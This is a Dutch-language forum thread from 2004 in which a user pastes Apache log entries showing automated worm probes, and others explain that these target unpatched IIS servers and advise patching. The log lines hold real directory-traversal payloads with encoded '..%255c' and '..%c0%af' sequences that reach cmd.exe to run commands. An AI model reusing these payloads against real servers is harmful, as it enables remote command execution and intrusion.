anoniem Geplaatst: 27 januari 2004 Delen Geplaatst: 27 januari 2004 In de logboeken van mijn Apache server komt het volgende nog wel eens voor: [code:1:d32463b928] 80.56.100.37 - - [27/Jan/2004:20:06:20 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 294 80.56.100.37 - - [27/Jan/2004:20:06:27 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 292 80.56.100.37 - - [27/Jan/2004:20:06:40 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 80.56.100.37 - - [27/Jan/2004:20:06:48 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 80.56.100.37 - - [27/Jan/2004:20:06:55 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 80.56.100.37 - - [27/Jan/2004:20:07:02 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 80.56.100.37 - - [27/Jan/2004:20:07:08 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 80.56.100.37 - - [27/Jan/2004:20:07:15 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 80.56.100.37 - - [27/Jan/2004:20:07:23 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 80.56.100.37 - - [27/Jan/2004:20:07:36 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 80.56.100.37 - - [27/Jan/2004:20:07:43 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 80.56.100.37 - - [27/Jan/2004:20:07:49 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 80.56.100.37 - - [27/Jan/2004:20:07:56 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 306[/code:1:d32463b928] Wie is in godsnaam 80.56.100.37 en hoe kan ie in een scripts directory komen en mijn Winnt/system32/cmdr.exe aanroepen? :-? Quote Link naar reactie
anoniem Geplaatst: 27 januari 2004 Auteur Delen Geplaatst: 27 januari 2004 Ik had laatst hetzelfde met Apache. Na wat onderzoek bleek dus dat het een aanval van een virus was. Dat virus verspreidde zich via (slecht beveiligde) IIS servers dus met Apache zit je safe :) Quote Link naar reactie
anoniem Geplaatst: 27 januari 2004 Auteur Delen Geplaatst: 27 januari 2004 Maar hoe komt die PC van diegene dan aan mijn IP adres? Het laatste wat ik zal doen is mijn IP adres openbaar het internet opgooien.... :roll: Quote Link naar reactie
anoniem Geplaatst: 27 januari 2004 Auteur Delen Geplaatst: 27 januari 2004 De meeste van dit soort virussen hebben een random IP-adress generator. Die bedenken dus zelf een range IP-adressen en als op een van die IP-adressen op poort 80 een response gegeven wordt probeert ie het een en ander uit. Quote Link naar reactie
anoniem Geplaatst: 27 januari 2004 Auteur Delen Geplaatst: 27 januari 2004 Aha, dat klinkt logisch eigenlijk ja. Dus ik heb niks te vrezen? Ik heb een hardwarematige router met firewall, dan een software firewall (Zone Alarm) en Norton Antivirus 2003. Quote Link naar reactie
anoniem Geplaatst: 29 januari 2004 Auteur Delen Geplaatst: 29 januari 2004 Hoeft niet eens een virus te zijn. Zijn gewoon standaard scriptjes die elke scriptkiddie (ik hoop nu niemand op gedachten te brengen) kan downloaden en op een ip-range kan loslaten. Als ergens een webserver op poort 80 wordt ontdekt, dan gaat ie op zoek naar alle bekende zwaktes (vooral van IIS). Als er een gevonden is: bingo! vanaf dat moment kan je machine voor vanalles gebruikt worden (zo hadden er eens 2 uur nadat ik een machine online had gebracht -en ik nog aan het patchen was- een paar ettertjes een FTP server met cracks op mijn pc gekopieerd... viel alleen op toen ik mijn up- en download snelheid zag dalen. Denk alleen niet dat zonealarm en je router je beschermen: als jij poort 80 openzet, en niet je webserver regelmatig van de laatste security updates en beschermingen voorziet... ben je alsnog de bok. Quote Link naar reactie
anoniem Geplaatst: 1 februari 2004 Auteur Delen Geplaatst: 1 februari 2004 haha lol ik denk dat jullie dit eens moeten lezen: http://www.moenen.org/lessen.php?idnr=27 oud hoor ;) =) :D [quote:e64619dc11="Cmdr Chakotay"] Wie is in godsnaam 80.56.100.37 [/quote:e64619dc11] haha ja dat is gewoon iemand die wel ffkes wil kijken in je pc.. maar iig.. moeje ff hier naartoe gaan: http://www.visualroute.nedcomp.nl/ [size=9:e64619dc11]altijd handig, zown visualroute-server =D ghehe[/size:e64619dc11] anyway, dan kom je uit bij iemand in NL met chello, in de buurt van apeldoorn.. :P:P leuk hoor allemaal :P niet dat je er zoveel aan hebt, maar als jij daar in de buurt woont, en hij gebruikt geen proxy's, dan heb je een grote kans dat hij jou kent :) (en meestal dus ook andersom =) nou de groeten maar weer, Dionysus. (a.k.a. MAXimum :P) Quote Link naar reactie
anoniem Geplaatst: 4 februari 2004 Auteur Delen Geplaatst: 4 februari 2004 kun je niet beter dan je port: 80 veranderen in bijv. port 180 ofzo ? weet niet of dit uitmaakt... Quote Link naar reactie
anoniem Geplaatst: 4 februari 2004 Auteur Delen Geplaatst: 4 februari 2004 [quote:8cea00bc20="JaZu"]kun je niet beter dan je port: 80 veranderen in bijv. port 180 ofzo ? weet niet of dit uitmaakt...[/quote:8cea00bc20] dat [i:8cea00bc20]kan[/i:8cea00bc20], maar ik zou het niet aanraden.. dan word het voor andere mensen alleen maar ingewikkelder :P want dat wordt 't bij jou dus: http://80.56.100.37:180/ muhaha ja het kan, vooral als je niet wilt dat iedereen er op komt, ik zou het niet doen though.. btw als mensen het willen zien dat krijgen ze het toch wel te zien, als je een poortscan doet zie je gelijk dat 180 dan open staat ghehe maja EN ik zou toch echt eens overwegen om niet windows als server te gebruiken.. niet dat ik dat ooit gebruikt heb, maar lijkt me niet al te veilig als er nog meer van zulke trucjes dan deze zijn ghehe (en anders probeer eens een upgrade als die er is :P) Quote Link naar reactie
Aanbevolen berichten
Om een reactie te plaatsen, moet je eerst inloggen